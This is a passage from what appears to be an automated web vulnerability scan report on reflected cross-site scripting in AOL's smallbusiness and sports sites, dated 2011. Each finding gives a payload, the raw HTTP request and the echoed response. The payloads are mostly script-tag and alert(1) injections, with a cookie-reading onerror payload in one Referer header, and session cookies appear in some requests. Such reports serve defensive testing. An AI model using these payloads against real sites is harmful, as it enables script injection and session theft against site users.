The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b6e"><script>alert(1)</script>a03fac11be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/?53b6e"><script>alert(1)</script>a03fac11be7=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:04 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/?53b6e"><script>alert(1)</script>a03fac11be7=1"/>
...[SNIP]...

1.200. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f14"%20a%3db%202dd62ea6f1a was submitted in the REST URL parameter 3. This input was echoed as e4f14" a=b 2dd62ea6f1a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/02e4f14"%20a%3db%202dd62ea6f1a/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:13 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:12 GMT; path=/
Keep-Alive: timeout=5, max=999972
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 82596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/02e4f14" a=b 2dd62ea6f1a/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/">
...[SNIP]...

1.201. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c220"><script>alert(1)</script>01c18185ad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/?9c220"><script>alert(1)</script>01c18185ad3=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:04 GMT; path=/
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 82663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/?9c220"><script>alert(1)</script>01c18185ad3=1"/>
...[SNIP]...

1.202. http://smallbusiness.aol.com/2011/02/05/make-friends/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /2011/02/05/make-friends/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8709"a%3d"b"648ab0da27 was submitted in the REST URL parameter 3. This input was echoed as c8709"a="b"648ab0da27 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/05c8709"a%3d"b"648ab0da27/make-friends/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:11 GMT; path=/
Keep-Alive: timeout=5, max=999960
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 59105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/05c8709"a="b"648ab0da27/make-friends/">
...[SNIP]...

1.203. http://smallbusiness.aol.com/2011/02/05/make-friends/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/05/make-friends/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c25"><script>alert(1)</script>7fcfb2a62be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:03 GMT; path=/
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 59176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1"/>
...[SNIP]...

1.204. http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3ca"><script>alert(1)</script>e8a6ea52003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/?ae3ca"><script>alert(1)</script>e8a6ea52003=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:02 GMT; path=/
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/?ae3ca"><script>alert(1)</script>e8a6ea52003=1"/>
...[SNIP]...

1.205. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /2011/02/06/enjoy-the-ride/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa121"a%3d"b"4a36e3efe23 was submitted in the REST URL parameter 3. This input was echoed as fa121"a="b"4a36e3efe23 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/06fa121"a%3d"b"4a36e3efe23/enjoy-the-ride/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:11 GMT; path=/
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 58597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/06fa121"a="b"4a36e3efe23/enjoy-the-ride/">
...[SNIP]...

1.206. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/06/enjoy-the-ride/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3029a"><script>alert(1)</script>5a9c8cbf6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/enjoy-the-ride/?3029a"><script>alert(1)</script>5a9c8cbf6a4=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:04 GMT; path=/
Keep-Alive: timeout=5, max=999986
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 58663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/?3029a"><script>alert(1)</script>5a9c8cbf6a4=1"/>
...[SNIP]...

1.207. http://smallbusiness.aol.com/category/advertising-and-marketing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /category/advertising-and-marketing/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c1c"><a>d5dbf42efbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /category/advertising-and-marketinga5c1c"><a>d5dbf42efbb/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 44344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/advertising-and-marketinga5c1c"><a>d5dbf42efbb/"/>
...[SNIP]...

1.208. http://smallbusiness.aol.com/category/advertising-and-marketing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /category/advertising-and-marketing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10cba"><script>alert(1)</script>fedb4407f14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/advertising-and-marketing/?10cba"><script>alert(1)</script>fedb4407f14=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999995
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 79036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/advertising-and-marketing/?10cba"><script>alert(1)</script>fedb4407f14=1"/>
...[SNIP]...

1.209. http://smallbusiness.aol.com/category/money/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /category/money/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174a7"><a>518d741443b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /category/money174a7"><a>518d741443b/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:09 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 44284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/money174a7"><a>518d741443b/"/>
...[SNIP]...

1.210. http://smallbusiness.aol.com/category/money/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /category/money/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8fe7"><script>alert(1)</script>94d4958289d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/money/?e8fe7"><script>alert(1)</script>94d4958289d=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999976
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/money/?e8fe7"><script>alert(1)</script>94d4958289d=1"/>
...[SNIP]...

1.211. http://smallbusiness.aol.com/category/starting-a-business/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /category/starting-a-business/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6b07"><a>43900fd15f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /category/starting-a-businessd6b07"><a>43900fd15f2/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:11 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999955
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 44328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/starting-a-businessd6b07"><a>43900fd15f2/"/>
...[SNIP]...

1.212. http://smallbusiness.aol.com/category/starting-a-business/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /category/starting-a-business/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06dc"><script>alert(1)</script>c0f94426d7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/starting-a-business/?b06dc"><script>alert(1)</script>c0f94426d7b=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 79328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/starting-a-business/?b06dc"><script>alert(1)</script>c0f94426d7b=1"/>
...[SNIP]...

1.213. http://sports.aol.com/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c was submitted in the REST URL parameter 1. This input was echoed as 3ed00--><img src=a onerror=alert(1)>6108271377c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /a3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:20:49 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24927
Connection: close
Content-Length: 24927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--req:101x1_1.us.sports20.a3ed00--><img src=a onerror=alert(1)>6108271377c.broadband ad:none (recursion blocked at default(mn=0)) -->
...[SNIP]...

1.214. http://sports.aol.com/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96673"-alert(1)-"6a5552da2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a96673"-alert(1)-"6a5552da2b6 HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:20:48 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24818
Connection: close
Content-Length: 24818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld30 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.sports";
s_265.trackExternalLinks="true";
s_265.prop1="a96673"-alert(1)-"6a5552da2b6";
s_265.pfxID="spr";
s_265.disablepihost=false;
s_265.prop12="http://sports.aol.com/a96673\"-alert(1)-\"6a5552da2b6";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)d
...[SNIP]...

1.215. http://sports.aol.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87de0</script><script>alert(1)</script>d5d06ef2b0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
